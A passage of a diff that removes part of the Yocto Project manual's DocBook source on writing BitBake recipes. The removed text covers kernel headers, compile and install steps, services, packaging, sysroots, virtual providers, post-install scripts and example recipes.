- <filename>meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc</filename>).
- </note>
- The correct way to interface to a device or custom kernel is
- to use a separate package that provides the additional headers
- for the driver or other unique interfaces.
- When doing so, your application also becomes responsible for
- creating a dependency on that specific provider.
- </para>
-
- <para>
- Consider the following:
- <itemizedlist>
- <listitem><para>
- Never modify
- <filename>linux-libc-headers.inc</filename>.
- Consider that file to be part of the
- <filename>libc</filename> system, and not something
- you use to access the kernel directly.
- You should access <filename>libc</filename> through
- specific <filename>libc</filename> calls.
- </para></listitem>
- <listitem><para>
- Applications that must talk directly to devices
- should either provide necessary headers themselves,
- or establish a dependency on a special headers package
- that is specific to that driver.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For example, suppose you want to modify an existing header
- that adds I/O control or network support.
- If the modifications are used by a small number programs,
- providing a unique version of a header is easy and has little
- impact.
- When doing so, bear in mind the guidelines in the previous
- list.
- <note>
- If for some reason your changes need to modify the behavior
- of the <filename>libc</filename>, and subsequently all
- other applications on the system, use a
- <filename>.bbappend</filename> to modify the
- <filename>linux-kernel-headers.inc</filename> file.
- However, take care to not make the changes
- machine specific.
- </note>
- </para>
-
- <para>
- Consider a case where your kernel is older and you need
- an older <filename>libc</filename> ABI.
- The headers installed by your recipe should still be a
- standard mainline kernel, not your own custom one.
- </para>
-
- <para>
- When you use custom kernel headers you need to get them from
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></ulink>,
- which is the directory with kernel headers that are
- required to build out-of-tree modules.
- Your recipe will also need the following:
- <literallayout class='monospaced'>
- do_configure[depends] += "virtual/kernel:do_shared_workdir"
- </literallayout>
- </para>
- </section>
-
- <section id='new-recipe-compilation'>
- <title>Compilation</title>
-
- <para>
- During a build, the <filename>do_compile</filename> task
- happens after source is fetched, unpacked, and configured.
- If the recipe passes through <filename>do_compile</filename>
- successfully, nothing needs to be done.
- </para>
-
- <para>
- However, if the compile step fails, you need to diagnose the
- failure.
- Here are some common issues that cause failures.
- <note>
- For cases where improper paths are detected for
- configuration files or for when libraries/headers cannot
- be found, be sure you are using the more robust
- <filename>pkg-config</filename>.
- See the note in section
- "<link linkend='new-recipe-configuring-the-recipe'>Configuring the Recipe</link>"
- for additional information.
- </note>
- <itemizedlist>
- <listitem><para><emphasis>Parallel build failures:</emphasis>
- These failures manifest themselves as intermittent
- errors, or errors reporting that a file or directory
- that should be created by some other part of the build
- process could not be found.
- This type of failure can occur even if, upon inspection,
- the file or directory does exist after the build has
- failed, because that part of the build process happened
- in the wrong order.</para>
- <para>To fix the problem, you need to either satisfy
- the missing dependency in the Makefile or whatever
- script produced the Makefile, or (as a workaround)
- set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></ulink>
- to an empty string:
- <literallayout class='monospaced'>
- PARALLEL_MAKE = ""
- </literallayout></para>
- <para>
- For information on parallel Makefile issues, see the
- "<link linkend='debugging-parallel-make-races'>Debugging Parallel Make Races</link>"
- section.
- </para></listitem>
- <listitem><para><emphasis>Improper host path usage:</emphasis>
- This failure applies to recipes building for the target
- or <filename>nativesdk</filename> only.
- The failure occurs when the compilation process uses
- improper headers, libraries, or other files from the
- host system when cross-compiling for the target.
- </para>
- <para>To fix the problem, examine the
- <filename>log.do_compile</filename> file to identify
- the host paths being used (e.g.
- <filename>/usr/include</filename>,
- <filename>/usr/lib</filename>, and so forth) and then
- either add configure options, apply a patch, or do both.
- </para></listitem>
- <listitem><para><emphasis>Failure to find required
- libraries/headers:</emphasis>
- If a build-time dependency is missing because it has
- not been declared in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>,
- or because the dependency exists but the path used by
- the build process to find the file is incorrect and the
- configure step did not detect it, the compilation
- process could fail.
- For either of these failures, the compilation process
- notes that files could not be found.
- In these cases, you need to go back and add additional
- options to the configure script as well as possibly
- add additional build-time dependencies to
- <filename>DEPENDS</filename>.</para>
- <para>Occasionally, it is necessary to apply a patch
- to the source to ensure the correct paths are used.
- If you need to specify paths to find files staged
- into the sysroot from other recipes, use the variables
- that the OpenEmbedded build system provides
- (e.g.
- <filename>STAGING_BINDIR</filename>,
- <filename>STAGING_INCDIR</filename>,
- <filename>STAGING_DATADIR</filename>, and so forth).
-<!--
- (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_BINDIR'><filename>STAGING_BINDIR</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_INCDIR'><filename>STAGING_INCDIR</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DATADIR'><filename>STAGING_DATADIR</filename></ulink>,
- and so forth).
--->
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='new-recipe-installing'>
- <title>Installing</title>
-
- <para>
- During <filename>do_install</filename>, the task copies the
- built files along with their hierarchy to locations that
- would mirror their locations on the target device.
- The installation process copies files from the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>,
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-B'><filename>B</filename></ulink><filename>}</filename>,
- and
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename>
- directories to the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>
- directory to create the structure as it should appear on the
- target system.
- </para>
-
- <para>
- How your software is built affects what you must do to be
- sure your software is installed correctly.
- The following list describes what you must do for installation
- depending on the type of build system used by the software
- being built:
- <itemizedlist>
- <listitem><para><emphasis>Autotools and CMake:</emphasis>
- If the software your recipe is building uses Autotools
- or CMake, the OpenEmbedded build
- system understands how to install the software.
- Consequently, you do not have to have a
- <filename>do_install</filename> task as part of your
- recipe.
- You just need to make sure the install portion of the
- build completes with no issues.
- However, if you wish to install additional files not
- already being installed by
- <filename>make install</filename>, you should do this
- using a <filename>do_install_append</filename> function
- using the install command as described in
- the "Manual" bulleted item later in this list.
- </para></listitem>
- <listitem><para><emphasis>Other (using
- <filename>make install</filename>):</emphasis>
- You need to define a
- <filename>do_install</filename> function in your
- recipe.
- The function should call
- <filename>oe_runmake install</filename> and will likely
- need to pass in the destination directory as well.
- How you pass that path is dependent on how the
- <filename>Makefile</filename> being run is written
- (e.g. <filename>DESTDIR=${D}</filename>,
- <filename>PREFIX=${D}</filename>,
- <filename>INSTALLROOT=${D}</filename>, and so forth).
- </para>
- <para>For an example recipe using
- <filename>make install</filename>, see the
- "<link linkend='new-recipe-makefile-based-package'>Makefile-Based Package</link>"
- section.</para></listitem>
- <listitem><para><emphasis>Manual:</emphasis>
- You need to define a
- <filename>do_install</filename> function in your
- recipe.
- The function must first use
- <filename>install -d</filename> to create the
- directories under
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>.
- Once the directories exist, your function can use
- <filename>install</filename> to manually install the
- built software into the directories.</para>
- <para>You can find more information on
- <filename>install</filename> at
- <ulink url='http://www.gnu.org/software/coreutils/manual/html_node/install-invocation.html'></ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For the scenarios that do not use Autotools or
- CMake, you need to track the installation
- and diagnose and fix any issues until everything installs
- correctly.
- You need to look in the default location of
- <filename>${D}</filename>, which is
- <filename>${WORKDIR}/image</filename>, to be sure your
- files have been installed correctly.
- </para>
-
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- During the installation process, you might need to
- modify some of the installed files to suit the target
- layout.
- For example, you might need to replace hard-coded paths
- in an initscript with values of variables provided by
- the build system, such as replacing
- <filename>/usr/bin/</filename> with
- <filename>${bindir}</filename>.
- If you do perform such modifications during
- <filename>do_install</filename>, be sure to modify the
- destination file after copying rather than before
- copying.
- Modifying after copying ensures that the build system
- can re-execute <filename>do_install</filename> if
- needed.
- </para></listitem>
- <listitem><para>
- <filename>oe_runmake install</filename>, which can be
- run directly or can be run indirectly by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-cmake'><filename>cmake</filename></ulink>
- classes, runs <filename>make install</filename> in
- parallel.
- Sometimes, a Makefile can have missing dependencies
- between targets that can result in race conditions.
- If you experience intermittent failures during
- <filename>do_install</filename>, you might be able to
- work around them by disabling parallel Makefile
- installs by adding the following to the recipe:
- <literallayout class='monospaced'>
- PARALLEL_MAKEINST = ""
- </literallayout>
- See
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename></ulink>
- for additional information.
- </para></listitem>
- <listitem><para>
- If you need to install one or more custom CMake
- toolchain files that are supplied by the
- application you are building, install the files to
- <filename>${D}${datadir}/cmake/</filename> Modules
- during
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>.
- </para></listitem>
- </itemizedlist>
- </note>
- </section>
-
- <section id='new-recipe-enabling-system-services'>
- <title>Enabling System Services</title>
-
- <para>
- If you want to install a service, which is a process that
- usually starts on boot and runs in the background, then
- you must include some additional definitions in your recipe.
- </para>
-
- <para>
- If you are adding services and the service initialization
- script or the service file itself is not installed, you must
- provide for that installation in your recipe using a
- <filename>do_install_append</filename> function.
- If your recipe already has a <filename>do_install</filename>
- function, update the function near its end rather than
- adding an additional <filename>do_install_append</filename>
- function.
- </para>
-
- <para>
- When you create the installation for your services, you need
- to accomplish what is normally done by
- <filename>make install</filename>.
- In other words, make sure your installation arranges the output
- similar to how it is arranged on the target system.
- </para>
-
- <para>
- The OpenEmbedded build system provides support for starting
- services two different ways:
- <itemizedlist>
- <listitem><para><emphasis>SysVinit:</emphasis>
- SysVinit is a system and service manager that
- manages the init system used to control the very basic
- functions of your system.
- The init program is the first program
- started by the Linux kernel when the system boots.
- Init then controls the startup, running and shutdown
- of all other programs.</para>
- <para>To enable a service using SysVinit, your recipe
- needs to inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-update-rc.d'><filename>update-rc.d</filename></ulink>
- class.
- The class helps facilitate safely installing the
- package on the target.</para>
- <para>You will need to set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITSCRIPT_PACKAGES'><filename>INITSCRIPT_PACKAGES</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITSCRIPT_NAME'><filename>INITSCRIPT_NAME</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITSCRIPT_PARAMS'><filename>INITSCRIPT_PARAMS</filename></ulink>
- variables within your recipe.</para></listitem>
- <listitem><para><emphasis>systemd:</emphasis>
- System Management Daemon (systemd) was designed to
- replace SysVinit and to provide
- enhanced management of services.
- For more information on systemd, see the systemd
- homepage at
- <ulink url='http://freedesktop.org/wiki/Software/systemd/'></ulink>.
- </para>
- <para>To enable a service using systemd, your recipe
- needs to inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-systemd'><filename>systemd</filename></ulink>
- class.
- See the <filename>systemd.bbclass</filename> file
- located in your
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- section for more information.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='new-recipe-packaging'>
- <title>Packaging</title>
-
- <para>
- Successful packaging is a combination of automated processes
- performed by the OpenEmbedded build system and some
- specific steps you need to take.
- The following list describes the process:
- <itemizedlist>
- <listitem><para><emphasis>Splitting Files</emphasis>:
- The <filename>do_package</filename> task splits the
- files produced by the recipe into logical components.
- Even software that produces a single binary might
- still have debug symbols, documentation, and other
- logical components that should be split out.
- The <filename>do_package</filename> task ensures
- that files are split up and packaged correctly.
- </para></listitem>
- <listitem><para><emphasis>Running QA Checks</emphasis>:
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-insane'><filename>insane</filename></ulink>
- class adds a step to
- the package generation process so that output quality
- assurance checks are generated by the OpenEmbedded
- build system.
- This step performs a range of checks to be sure the
- build's output is free of common problems that show
- up during runtime.
- For information on these checks, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-insane'><filename>insane</filename></ulink>
- class and the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-qa-checks'>QA Error and Warning Messages</ulink>"
- chapter in the Yocto Project Reference Manual.
- </para></listitem>
- <listitem><para><emphasis>Hand-Checking Your Packages</emphasis>:
- After you build your software, you need to be sure
- your packages are correct.
- Examine the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/packages-split</filename>
- directory and make sure files are where you expect
- them to be.
- If you discover problems, you can set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>,
- <filename>do_install(_append)</filename>, and so forth as
- needed.
- </para></listitem>
- <listitem><para><emphasis>Splitting an Application into Multiple Packages</emphasis>:
- If you need to split an application into several
- packages, see the
- "<link linkend='splitting-an-application-into-multiple-packages'>Splitting an Application into Multiple Packages</link>"
- section for an example.
- </para></listitem>
- <listitem><para><emphasis>Installing a Post-Installation Script</emphasis>:
- For an example showing how to install a
- post-installation script, see the
- "<link linkend='new-recipe-post-installation-scripts'>Post-Installation Scripts</link>"
- section.
- </para></listitem>
- <listitem><para><emphasis>Marking Package Architecture</emphasis>:
- Depending on what your recipe is building and how it
- is configured, it might be important to mark the
- packages produced as being specific to a particular
- machine, or to mark them as not being specific to
- a particular machine or architecture at all.</para>
- <para>By default, packages apply to any machine with the
- same architecture as the target machine.
- When a recipe produces packages that are
- machine-specific (e.g. the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- value is passed into the configure script or a patch
- is applied only for a particular machine), you should
- mark them as such by adding the following to the
- recipe:
- <literallayout class='monospaced'>
- PACKAGE_ARCH = "${MACHINE_ARCH}"
- </literallayout></para>
- <para>On the other hand, if the recipe produces packages
- that do not contain anything specific to the target
- machine or architecture at all (e.g. recipes
- that simply package script files or configuration
- files), you should use the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-allarch'><filename>allarch</filename></ulink>
- class to do this for you by adding this to your
- recipe:
- <literallayout class='monospaced'>
- inherit allarch
- </literallayout>
- Ensuring that the package architecture is correct is
- not critical while you are doing the first few builds
- of your recipe.
- However, it is important in order
- to ensure that your recipe rebuilds (or does not
- rebuild) appropriately in response to changes in
- configuration, and to ensure that you get the
- appropriate packages installed on the target machine,
- particularly if you run separate builds for more
- than one target machine.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='new-sharing-files-between-recipes'>
- <title>Sharing Files Between Recipes</title>
-
- <para>
- Recipes often need to use files provided by other recipes on
- the build host.
- For example, an application linking to a common library needs
- access to the library itself and its associated headers.
- The way this access is accomplished is by populating a sysroot
- with files.
- Each recipe has two sysroots in its work directory, one for
- target files
- (<filename>recipe-sysroot</filename>) and one for files that
- are native to the build host
- (<filename>recipe-sysroot-native</filename>).
- <note>
- You could find the term "staging" used within the Yocto
- project regarding files populating sysroots (e.g. the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR'><filename>STAGING_DIR</filename></ulink>
- variable).
- </note>
- </para>
-
- <para>
- Recipes should never populate the sysroot directly (i.e. write
- files into sysroot).
- Instead, files should be installed into standard locations
- during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task within the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>
- directory.
- The reason for this limitation is that almost all files that
- populate the sysroot are cataloged in manifests in order to
- ensure the files can be removed later when a recipe is either
- modified or removed.
- Thus, the sysroot is able to remain free from stale files.
- </para>
-
- <para>
- A subset of the files installed by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task are used by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
- task as defined by the the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></ulink>
- variable to automatically populate the sysroot.
- It is possible to modify the list of directories that populate
- the sysroot.
- The following example shows how you could add the
- <filename>/opt</filename> directory to the list of
- directories within a recipe:
- <literallayout class='monospaced'>
- SYSROOT_DIRS += "/opt"
- </literallayout>
- </para>
-
- <para>
- For a more complete description of the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
- task and its associated functions, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-staging'><filename>staging</filename></ulink>
- class.
- </para>
- </section>
-
- <section id='metadata-virtual-providers'>
- <title>Using Virtual Providers</title>
-
- <para>
- Prior to a build, if you know that several different recipes
- provide the same functionality, you can use a virtual provider
- (i.e. <filename>virtual/*</filename>) as a placeholder for the
- actual provider.
- The actual provider is determined at build-time.
- </para>
-
- <para>
- A common scenario where a virtual provider is used would be
- for the kernel recipe.
- Suppose you have three kernel recipes whose
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>
- values map to <filename>kernel-big</filename>,
- <filename>kernel-mid</filename>, and
- <filename>kernel-small</filename>.
- Furthermore, each of these recipes in some way uses a
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PROVIDES'><filename>PROVIDES</filename></ulink>
- statement that essentially identifies itself as being able
- to provide <filename>virtual/kernel</filename>.
- Here is one way through the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-kernel'><filename>kernel</filename></ulink>
- class:
- <literallayout class='monospaced'>
- PROVIDES += "${@ "virtual/kernel" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else "" }"
- </literallayout>
- Any recipe that inherits the <filename>kernel</filename> class
- is going to utilize a <filename>PROVIDES</filename> statement
- that identifies that recipe as being able to provide the
- <filename>virtual/kernel</filename> item.
- </para>
-
- <para>
- Now comes the time to actually build an image and you need a
- kernel recipe, but which one?
- You can configure your build to call out the kernel recipe
- you want by using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></ulink>
- variable.
- As an example, consider the
- <ulink url='https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc'><filename>x86-base.inc</filename></ulink>
- include file, which is a machine
- (i.e. <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>)
- configuration file.
- This include file is the reason all x86-based machines use the
- <filename>linux-yocto</filename> kernel.
- Here are the relevant lines from the include file:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
- PREFERRED_VERSION_linux-yocto ??= "4.15%"
- </literallayout>
- </para>
-
- <para>
- When you use a virtual provider, you do not have to
- "hard code" a recipe name as a build dependency.
- You can use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- variable to state the build is dependent on
- <filename>virtual/kernel</filename> for example:
- <literallayout class='monospaced'>
- DEPENDS = "virtual/kernel"
- </literallayout>
- During the build, the OpenEmbedded build system picks
- the correct recipe needed for the
- <filename>virtual/kernel</filename> dependency based on the
- <filename>PREFERRED_PROVIDER</filename> variable.
- If you want to use the small kernel mentioned at the beginning
- of this section, configure your build as follows:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel ??= "kernel-small"
- </literallayout>
- <note>
- Any recipe that
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PROVIDES'><filename>PROVIDES</filename></ulink>
- a <filename>virtual/*</filename> item that is ultimately
- not selected through
- <filename>PREFERRED_PROVIDER</filename> does not get built.
- Preventing these recipes from building is usually the
- desired behavior since this mechanism's purpose is to
- select between mutually exclusive alternative providers.
- </note>
- </para>
-
- <para>
- The following lists specific examples of virtual providers:
- <itemizedlist>
- <listitem><para>
- <filename>virtual/kernel</filename>:
- Provides the name of the kernel recipe to use when
- building a kernel image.
- </para></listitem>
- <listitem><para>
- <filename>virtual/bootloader</filename>:
- Provides the name of the bootloader to use when
- building an image.
- </para></listitem>
- <listitem><para>
- <filename>virtual/mesa</filename>:
- Provides <filename>gbm.pc</filename>.
- </para></listitem>
- <listitem><para>
- <filename>virtual/egl</filename>:
- Provides <filename>egl.pc</filename> and possibly
- <filename>wayland-egl.pc</filename>.
- </para></listitem>
- <listitem><para>
- <filename>virtual/libgl</filename>:
- Provides <filename>gl.pc</filename> (i.e. libGL).
- </para></listitem>
- <listitem><para>
- <filename>virtual/libgles1</filename>:
- Provides <filename>glesv1_cm.pc</filename>
- (i.e. libGLESv1_CM).
- </para></listitem>
- <listitem><para>
- <filename>virtual/libgles2</filename>:
- Provides <filename>glesv2.pc</filename>
- (i.e. libGLESv2).
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='properly-versioning-pre-release-recipes'>
- <title>Properly Versioning Pre-Release Recipes</title>
-
- <para>
- Sometimes the name of a recipe can lead to versioning
- problems when the recipe is upgraded to a final release.
- For example, consider the
- <filename>irssi_0.8.16-rc1.bb</filename> recipe file in
- the list of example recipes in the
- "<link linkend='new-recipe-storing-and-naming-the-recipe'>Storing and Naming the Recipe</link>"
- section.
- This recipe is at a release candidate stage (i.e.
- "rc1").
- When the recipe is released, the recipe filename becomes
- <filename>irssi_0.8.16.bb</filename>.
- The version change from <filename>0.8.16-rc1</filename>
- to <filename>0.8.16</filename> is seen as a decrease by the
- build system and package managers, so the resulting packages
- will not correctly trigger an upgrade.
- </para>
-
- <para>
- In order to ensure the versions compare properly, the
- recommended convention is to set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- within the recipe to
- "<replaceable>previous_version</replaceable>+<replaceable>current_version</replaceable>".
- You can use an additional variable so that you can use the
- current version elsewhere.
- Here is an example:
- <literallayout class='monospaced'>
- REALPV = "0.8.16-rc1"
- PV = "0.8.15+${REALPV}"
- </literallayout>
- </para>
- </section>
-
- <section id='new-recipe-post-installation-scripts'>
- <title>Post-Installation Scripts</title>
-
- <para>
- Post-installation scripts run immediately after installing
- a package on the target or during image creation when a
- package is included in an image.
- To add a post-installation script to a package, add a
- <filename>pkg_postinst_</filename><replaceable>PACKAGENAME</replaceable><filename>()</filename> function to
- the recipe file (<filename>.bb</filename>) and replace
- <replaceable>PACKAGENAME</replaceable> with the name of the package
- you want to attach to the <filename>postinst</filename>
- script.
- To apply the post-installation script to the main package
- for the recipe, which is usually what is required, specify
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
- in place of <replaceable>PACKAGENAME</replaceable>.
- </para>
-
- <para>
- A post-installation function has the following structure:
- <literallayout class='monospaced'>
- pkg_postinst_<replaceable>PACKAGENAME</replaceable>() {
- # Commands to carry out
- }
- </literallayout>
- </para>
-
- <para>
- The script defined in the post-installation function is
- called when the root filesystem is created.
- If the script succeeds, the package is marked as installed.
- <note>
- Any RPM post-installation script that runs on the target
- should return a 0 exit code.
- RPM does not allow non-zero exit codes for these scripts,
- and the RPM package manager will cause the package to fail
- installation on the target.
- </note>
- </para>
-
- <para>
- Sometimes it is necessary for the execution of a
- post-installation script to be delayed until the first boot.
- For example, the script might need to be executed on the
- device itself.
- To delay script execution until boot time, you must explicitly
- mark post installs to defer to the target.
- You can use <filename>pkg_postinst_ontarget()</filename> or
- call
- <filename>postinst_intercept delay_to_first_boot</filename>
- from <filename>pkg_postinst()</filename>.
- Any failure of a <filename>pkg_postinst()</filename> script
- (including exit 1) triggers an error during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>
- task.
- </para>
-
- <para>
- If you have recipes that use
- <filename>pkg_postinst</filename> function
- and they require the use of non-standard native
- tools that have dependencies during rootfs construction, you
- need to use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_WRITE_DEPS'><filename>PACKAGE_WRITE_DEPS</filename></ulink>
- variable in your recipe to list these tools.
- If you do not use this variable, the tools might be missing and
- execution of the post-installation script is deferred until
- first boot.
- Deferring the script to first boot is undesirable and for
- read-only rootfs impossible.
- </para>
-
- <note>
- Equivalent support for pre-install, pre-uninstall, and
- post-uninstall scripts exist by way of
- <filename>pkg_preinst</filename>,
- <filename>pkg_prerm</filename>, and
- <filename>pkg_postrm</filename>, respectively.
- These scrips work in exactly the same way as does
- <filename>pkg_postinst</filename> with the exception
- that they run at different times.
- Also, because of when they run, they are not applicable to
- being run at image creation time like
- <filename>pkg_postinst</filename>.
- </note>
- </section>
-
- <section id='new-recipe-testing'>
- <title>Testing</title>
-
- <para>
- The final step for completing your recipe is to be sure that
- the software you built runs correctly.
- To accomplish runtime testing, add the build's output
- packages to your image and test them on the target.
- </para>
-
- <para>
- For information on how to customize your image by adding
- specific packages, see the
- "<link linkend='usingpoky-extend-customimage'>Customizing Images</link>"
- section.
- </para>
- </section>
-
- <section id='new-recipe-testing-examples'>
- <title>Examples</title>
-
- <para>
- To help summarize how to write a recipe, this section provides
- some examples given various scenarios:
- <itemizedlist>
- <listitem><para>Recipes that use local files</para></listitem>
- <listitem><para>Using an Autotooled package</para></listitem>
- <listitem><para>Using a Makefile-based package</para></listitem>
- <listitem><para>Splitting an application into multiple packages</para></listitem>
- <listitem><para>Adding binaries to an image</para></listitem>
- </itemizedlist>
- </para>
-
- <section id='new-recipe-single-c-file-package-hello-world'>
- <title>Single .c File Package (Hello World!)</title>
-
- <para>
- Building an application from a single file that is stored
- locally (e.g. under <filename>files</filename>) requires
- a recipe that has the file listed in the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>
- variable.
- Additionally, you need to manually write the
- <filename>do_compile</filename> and
- <filename>do_install</filename> tasks.
- The <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'>S</ulink></filename>
- variable defines the directory containing the source code,
- which is set to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>
- in this case - the directory BitBake uses for the build.
- <literallayout class='monospaced'>
- SUMMARY = "Simple helloworld application"
- SECTION = "examples"
- LICENSE = "MIT"
- LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
-
- SRC_URI = "file://helloworld.c"
-
- S = "${WORKDIR}"
-
- do_compile() {
- ${CC} helloworld.c -o helloworld
- }
-
- do_install() {
- install -d ${D}${bindir}
- install -m 0755 helloworld ${D}${bindir}
- }
- </literallayout>
- </para>
-
- <para>
- By default, the <filename>helloworld</filename>,
- <filename>helloworld-dbg</filename>, and
- <filename>helloworld-dev</filename> packages are built.
- For information on how to customize the packaging process,
- see the
- "<link linkend='splitting-an-application-into-multiple-packages'>Splitting an Application into Multiple Packages</link>"
- section.
- </para>
- </section>
-
- <section id='new-recipe-autotooled-package'>
- <title>Autotooled Package</title>
- <para>
- Applications that use Autotools such as <filename>autoconf</filename> and
- <filename>automake</filename> require a recipe that has a source archive listed in
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename> and
- also inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
- class, which contains the definitions of all the steps
- needed to build an Autotool-based application.
- The result of the build is automatically packaged.
- And, if the application uses NLS for localization, packages with local information are
- generated (one package per language).
- Following is one example: (<filename>hello_2.3.bb</filename>)
- <literallayout class='monospaced'>
- SUMMARY = "GNU Helloworld application"
- SECTION = "examples"
- LICENSE = "GPLv2+"
- LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
-
- SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.gz"
-
- inherit autotools gettext
- </literallayout>
- </para>
-
- <para>
- The variable
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'>LIC_FILES_CHKSUM</ulink></filename>
- is used to track source license changes as described in the
- "<link linkend='usingpoky-configuring-LIC_FILES_CHKSUM'>Tracking License Changes</link>"
- section in the Yocto Project Overview and Concepts Manual.
- You can quickly create Autotool-based recipes in a manner
- similar to the previous example.
- </para>
- </section>
-
- <section id='new-recipe-makefile-based-package'>
- <title>Makefile-Based Package</title>
-
- <para>
- Applications that use GNU <filename>make</filename> also require a recipe that has
- the source archive listed in
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>.
- You do not need to add a <filename>do_compile</filename> step since by default BitBake
- starts the <filename>make</filename> command to compile the application.
- If you need additional <filename>make</filename> options, you should store them in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
- variables.
- BitBake passes these options into the GNU <filename>make</filename> invocation.
- Note that a <filename>do_install</filename> task is still required.
- Otherwise, BitBake runs an empty <filename>do_install</filename> task by default.
- </para>
-
- <para>
